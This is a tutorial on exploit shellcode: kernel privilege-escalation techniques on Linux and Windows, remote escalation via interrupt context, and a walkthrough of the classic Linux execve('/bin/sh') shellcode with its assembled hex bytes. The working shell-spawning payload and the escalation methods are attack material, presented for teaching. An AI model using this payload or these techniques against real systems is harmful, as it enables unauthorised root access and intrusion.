Privilege escalation shellcode
The shellcode of a kernel exploit differs in nature from that of a user-land exploit. The former is used for privilege escalation, while the latter usually just hijacks the execution flow to the attacker's advantage. Remote kernel exploit shellcode shares the characteristics of both worlds: it hijacks the execution flow and also performs a privilege escalation. The second difference is that kernel exploit shellcode may run in a different context: process context or, in the case of remote exploits, interrupt context. In addition to these two differences, you do not need to worry about null bytes in your kernel exploit shellcode. For local exploits the shellcode is simply compiled into your exploit code, and for remote exploits the shellcode is not read as a string, so you do not need to worry about null bytes being interpreted as a string terminator.
For privilege escalation, a limited user needs to hijack a kernel execution path. The x86 architecture has four privilege levels, ring 0 to ring 3. Kernel code runs in ring 0 and thus has access to the full instruction set. User applications normally run in ring 3. Apart from the limited instruction set, an application's access to system objects is explicitly defined by the operating system. For example, an application with superuser privileges can access pretty much everything, but a limited user is restricted to the roles or privileges it has been granted.
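As a small illustration of the ring model, the current privilege level on x86 is held in the low two bits of the CS segment selector. The sketch below only does that bit arithmetic; the function names are hypothetical, and the selector values 0x10 and 0x33 are example inputs assumed for illustration, not values read from a live system.

```python
def current_privilege_level(cs_selector):
    """Return the ring number encoded in the low two bits of a CS selector."""
    return cs_selector & 0b11


def describe_ring(cs_selector):
    """Give a human-readable label for the ring a selector corresponds to."""
    ring = current_privilege_level(cs_selector)
    if ring == 0:
        return "ring 0 (kernel)"
    if ring == 3:
        return "ring 3 (user)"
    return f"ring {ring}"


# Example selector values (assumed for illustration only).
for selector in (0x10, 0x33):
    print(hex(selector), "->", describe_ring(selector))
```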
The logic behind a privilege escalation shellcode is simple: find the credentials of the running process and add full privileges to its access token. Most of the time this logic can be implemented directly, though sometimes we need to create a whole new set of privileges and spawn a child process using the created credentials. The implementation differs between operating systems, so we examine Linux and Windows in the following sections. What all kernel exploit shellcode has in common is a recovery phase. As mentioned in the writing kernel exploits article, hijacking a kernel path and triggering a vulnerability is not without cost. The hijacked path may have acquired a semaphore or lock, or the exploit may have trashed some important kernel structure. Therefore, to avoid a kernel crash or panic, we should clean up our mess. In the last section I talk about remote privilege escalation shellcode.
Linux privilege escalation
In the Linux world, the privileges of a process are stored in a structure (the process descriptor or process control block), and a pointer to it can be found at the bottom of the running process's kernel stack. Getting a pointer to the bottom of the stack is as easy as masking off the low bits of the current stack pointer according to the stack size, which is typically 4KB or 8KB. Finding the exact offset of the access token can be done in two ways: either by using a kernel debugger and hardcoding the offset found, or by using a heuristic approach. After that, privilege escalation is just a matter of writing 0 to the access token fields; 0 is the uid of the root account. If this method, known as UID patching, is not an option, we can use kernel functions that create a whole new access token and attach it to the process. Of course, most of the time these functions are not exported and you need to find their addresses in the kernel in order to call them. In Linux, searching for a specific kernel symbol can be done through the /proc/kallsyms file, which has traditionally been readable by any process (newer kernels may hide the addresses from unprivileged users).
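The stack-masking step can be sketched as plain arithmetic. This is a minimal illustration that assumes the stack is aligned to its own size and that the size is a power of two; the function name and the sample stack pointer value are hypothetical.

```python
def stack_base(stack_pointer, stack_size):
    """Round a stack pointer down to the start of its size-aligned stack."""
    if stack_size <= 0 or stack_size & (stack_size - 1):
        raise ValueError("stack_size must be a power of two")
    # Clearing the low bits is the same as: sp & ~(stack_size - 1)
    return stack_pointer & ~(stack_size - 1)


# Hypothetical kernel stack pointer, used only to show the arithmetic.
sample_sp = 0xC1235ABC
print(hex(stack_base(sample_sp, 8 * 1024)))  # 8KB stacks
print(hex(stack_base(sample_sp, 4 * 1024)))  # 4KB stacks
```

The two stack sizes give different bases for the same pointer, which is why the shellcode has to know (or guess) the stack size of the target kernel.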
Windows privilege escalation
The Windows access management mechanism is more complex, but it implements the same idea: every process has an access token, and privilege escalation is as easy as patching that token. Access tokens do not contain just a few ids like the Linux uids. They contain complex objects such as SIDs, and they also contain privileges that are defined either as a bitmap or as a list of ids. The structure that holds a pointer to the access token is the EPROCESS structure (EPROCESS contains a pointer to the access token, the Process Control Block, and so on). A pointer to the EPROCESS can be reached through the Kernel Processor Control Block (KPRCB), which in turn can be found from the Kernel Processor Control Region (KPCR). The KPCR is reachable through the FS segment register on 32-bit Windows, or GS on 64-bit Windows. A kernel API also exists that does all the dirty work and gives us a reference to the EPROCESS. Again, the offset of the access token can be found either with a kernel debugger and hardcoded, or with a heuristic approach. There is also a ZwCreateToken API which can be used in cases where patching is not an option. This API is undocumented, and to use it you have to find its address by searching kernel memory.
Remote privilege escalation shellcode
For a remote kernel exploit you need to find a vulnerable network driver. A driver often runs in interrupt context. This means you either have to run your shellcode in interrupt context or escape from that context. Interrupt context has the same privilege level as process context (the context in which most system calls run), but it cannot sleep or be rescheduled by the operating system. For this reason most system calls cannot be called from interrupt context. These limits push us to escape this context and move to process context before executing our privilege escalation code.
After the privilege escalation is done we probably want to return a remote shell, but how? The journey of our exploit began with a hardware interrupt (raised by the network card), so there is no supporting process that lets us spawn a child process. To understand the problem, compare the situation with a local kernel exploit. There you have probably issued a system call into a vulnerable path, and after privilege escalation you let the process continue normally because you control the running application. In a remote scenario things are different. To escape interrupt context you have to, for example, modify the system call table and wait for a process to issue that system call. Once it does, your privilege escalation code kicks in and elevates the privileges of the calling process, but the task is not done. You still need to return to the caller and run code that spawns a shell and connects it to a port. To do that, you need to return to user-land in a subtle manner that is not only safe but also leads to the execution of the rest of your shellcode.
By using the IRET/IRETQ instruction and overwriting the caller's return address on the stack with the address of the rest of your shellcode (in user-land), you can get the shell-spawning and connect-back code to execute successfully. As you may have noticed, our shellcode has three stages, and in each stage only part of the shellcode is executed. At each stage, the code for the next stage may be copied somewhere else.
Building shellcode tutorial
What is shellcode?
Shellcode is a series of position-independent bytes that perform a certain task. In other words, shellcode can be injected anywhere in memory and run. You can feed shellcode to your exploit and expect it to fulfill your goal without worrying about code dependencies. Shellcode differs from ordinary compiled code because it must have certain characteristics in order to be injected. First, it should not contain any null bytes, because shellcode is usually injected as string data and a null byte acts as the string terminator. Second, it needs to be very small so that it fits into a small buffer.
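The two constraints above (no null bytes, small size) are easy to check mechanically. The helper below is a minimal sketch; the function name, the sample byte strings and the buffer sizes are assumptions made for illustration.

```python
def check_payload(payload, max_len):
    """Return a list of reasons why a byte string breaks the two constraints."""
    problems = []
    null_offsets = [i for i, b in enumerate(payload) if b == 0]
    if null_offsets:
        problems.append(f"null bytes at offsets {null_offsets}")
    if len(payload) > max_len:
        problems.append(f"{len(payload)} bytes does not fit in {max_len}")
    return problems


# Sample inputs chosen only to exercise the checks.
print(check_payload(bytes.fromhex("31 c0"), max_len=64))           # passes
print(check_payload(bytes.fromhex("b8 00 00 00 00"), max_len=4))   # fails both
```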
How to write a shellcode?
Most hackers use previously built shellcode, and with a framework like Metasploit it is very easy to use common shellcode in an exploit. Still, a professional hacker undeniably needs to be able to write shellcode. Shellcode is developed in assembly language, but not every piece of assembly code is shellcode, for the reasons explained at the beginning of this tutorial. Below is a basic local exploit shellcode that spawns a shell on Linux:
BITS 32
    jmp short two         ; Jump down to the bottom for the call trick.
one:
    ; int execve(const char *filename, char *const argv[], char *const envp[])
    pop ebx               ; Ebx has the addr of the string.
    xor eax, eax          ; Put 0 into eax.
    mov [ebx+7], al       ; Null terminate the /bin/sh string.
    mov [ebx+8], ebx      ; Put addr from ebx where the AAAA is.
    mov [ebx+12], eax     ; Put 32-bit null terminator where the BBBB is.
    lea ecx, [ebx+8]      ; Load the address of [ebx+8] into ecx for argv ptr.
    lea edx, [ebx+12]     ; Edx = ebx + 12, which is the envp ptr.
    mov al, 11            ; Syscall #11
    int 0x80              ; Do it.
two:
    call one              ; Use a call to get string address.
    db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed.
Shellcode example, taken from The Art of Exploitation book
This code is to hackers what a Picasso masterpiece is to painters! First we have a short jump to the end of the code. Seems absurd? It is an ingenious way to obtain the string's address without null bytes: the call at the end jumps backwards, so its offset is negative and contains no zero bytes. Shellcode has no data segment (because it must be position independent), so to define a variable we have to use the stack. We cannot simply write push '/bin/shXAAAABBBB', because push takes a register, a memory operand or a small immediate, not a 16-byte string. So to get the variable's address onto the stack we use the function-calling mechanism. We know that when we call a function, the address of the next instruction is saved on the stack. So we deliberately make a call to save the address of '/bin/shXAAAABBBB' on the stack and then pop it in the next instruction. Later, when the shellcode runs, we write the null terminator of this string (over the X). You may wonder why we need this text at all: '/bin/sh' is the filename parameter of the execve system call (number 11). The XAAAABBBB part is just reserved space that the mov instructions overwrite later in the code.
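To make the layout of the reserved bytes concrete, the sketch below replays the three mov instructions on a copy of the string in Python. It only models the memory writes; the function name and the base address 0xBFFFF71D are hypothetical stand-ins for whatever address ebx would hold at run time.

```python
import struct


def patch_string_area(base_addr):
    """Replay the three mov instructions on a copy of the data bytes."""
    buf = bytearray(b"/bin/shXAAAABBBB")
    buf[7] = 0                                  # mov [ebx+7], al   (X -> NUL)
    buf[8:12] = struct.pack("<I", base_addr)    # mov [ebx+8], ebx  (AAAA -> &string)
    buf[12:16] = struct.pack("<I", 0)           # mov [ebx+12], eax (BBBB -> NULL)
    return buf


area = patch_string_area(0xBFFFF71D)
print("filename:", bytes(area[:8]))
print("argv    :", [hex(v) for v in struct.unpack_from("<II", area, 8)])
print("envp    :", hex(struct.unpack_from("<I", area, 12)[0]))
```

After the writes, offset 0 is a null-terminated filename, offset 8 is a two-entry argv array (pointer to the string, then NULL), and offset 12 doubles as an empty envp array, which is exactly what ebx, ecx and edx point at when the system call is issued.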
Notice that to avoid null bytes we used xor eax, eax instead of mov eax, 0. Also, to make the shellcode smaller we used lea ecx, [ebx+8], because the other option was to use two instructions to do the same thing:
mov ecx, ebx
add ecx, 8
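The effect of both choices can be seen by comparing the machine-code encodings. The sketch below hardcodes the standard 32-bit x86 encodings of the instructions discussed above and counts their length and null bytes; the dictionary and function names are hypothetical.

```python
# 32-bit x86 encodings of the instructions discussed above.
ENCODINGS = {
    "mov eax, 0": bytes.fromhex("b8 00 00 00 00"),
    "xor eax, eax": bytes.fromhex("31 c0"),
    "lea ecx, [ebx+8]": bytes.fromhex("8d 4b 08"),
    "mov ecx, ebx / add ecx, 8": bytes.fromhex("89 d9 83 c1 08"),
}


def describe(name):
    """Return (size in bytes, number of null bytes) for a named encoding."""
    code = ENCODINGS[name]
    return len(code), code.count(0)


for name in ENCODINGS:
    size, nulls = describe(name)
    print(f"{name:28s} {size} bytes, {nulls} null bytes")
```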
Assembling this code with nasm gives you the shell spawning bytes for a local exploit:
eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68
Shellcode bytes in hexadecimal
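The listing can be sanity-checked without running it. The sketch below parses the hex dump, confirms that it contains no null bytes, and decodes the two relative branches to show where the jmp and the call land. The helper names are hypothetical; the byte values are copied from the listing above.

```python
import struct

LISTING = (
    "eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b 08 8d 53 0c "
    "b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68"
)
code = bytes.fromhex(LISTING)


def short_jmp_target(buf, offset):
    """Decode 'jmp short' (opcode EB + signed 8-bit displacement)."""
    assert buf[offset] == 0xEB
    rel8 = struct.unpack_from("<b", buf, offset + 1)[0]
    return offset + 2 + rel8


def near_call_target(buf, offset):
    """Decode 'call rel32' (opcode E8 + signed 32-bit displacement)."""
    assert buf[offset] == 0xE8
    rel32 = struct.unpack_from("<i", buf, offset + 1)[0]
    return offset + 5 + rel32


call_offset = short_jmp_target(code, 0)            # label "two"
pop_offset = near_call_target(code, call_offset)   # label "one"
string_offset = call_offset + 5                    # return address pushed by call

print("length        :", len(code))
print("null bytes    :", code.count(0))
print("jmp lands at  :", call_offset)
print("call lands at :", pop_offset)
print("string bytes  :", code[string_offset:])
```

The backward call encodes its displacement as e5 ff ff ff, which is why the jump-then-call arrangement avoids the zero bytes that a forward call over a short distance would contain.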
Remote Port binding shellcode
The above shellcode works fine for local exploits, but for remote exploits it is useless, since it spawns the shell on the local terminal where the vulnerable program is running. To develop a remote port-binding shellcode you need to listen on a port and then duplicate the descriptor of the accepted connection onto the standard input and output of the spawned shell. On Linux this is done with system call 102 (socketcall) for the port binding and system call 63 (dup2) for duplicating the descriptor onto standard input and output. The code is deliberately not given, so that the reader can think about it, but if you are curious, refer to The Art of Exploitation book. If the shellcode succeeds, you can connect to the bound port with netcat and execute commands.